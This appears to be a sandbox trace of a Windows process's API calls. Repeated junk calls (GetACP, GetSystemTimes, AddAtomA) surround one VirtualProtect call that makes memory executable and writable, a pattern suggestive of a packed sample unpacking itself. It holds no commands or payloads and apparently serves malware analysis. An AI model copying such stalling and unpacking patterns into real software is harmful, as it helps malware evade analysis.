GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.305] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.305] GetACP () returned 0x4e4 [0111.305] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.306] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.306] GetACP () returned 0x4e4 [0111.306] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.307] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.307] GetACP () returned 0x4e4 [0111.307] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.307] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.307] GetACP () returned 0x4e4 [0111.307] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.307] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.307] GetACP () returned 0x4e4 [0111.711] VirtualProtect (in: lpAddress=0x525ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0111.711] AddAtomA (lpString=0x0) returned 0x0 [0111.711] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.712] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.712] AddAtomA (lpString=0x0) returned 0x0 [0111.712] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.713] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.713] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.713] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.714] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.714] AddAtomA (lpString=0x0) returned 0x0 [0111.714] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.715] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.715] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.715] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.716] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.716] AddAtomA (lpString=0x0) returned 0x0 [0111.716] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.717] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.717] AddAtomA (lpString=0x0) returned 0x0 [0111.717] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.718] AddAtomA (lpString=0x0) returned 0x0 [0111.718] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.718] AddAtomA (lpString=0x0) returned 0x0 [0111.718] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.718] AddAtomA (lpString=0x0) returned 0x0 [0111.718] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.718] AddAtomA (lpString=0x0) returned 0x0 [0111.718] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.718] AddAtomA (lpString=0x0) returned 0x0 [0111.718] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.718] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.719] AddAtomA (lpString=0x0) returned 0x0 [0111.719] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.719] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.720] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.720] AddAtomA (lpString=0x0) returned 0x0 [0111.720] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.721] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.721] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.721] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.722] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.722] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.722] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.723] AddAtomA (lpString=0x0) returned 0x0 [0111.723] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.723] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.724] AddAtomA (lpString=0x0) returned 0x0 [0111.724] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.724] 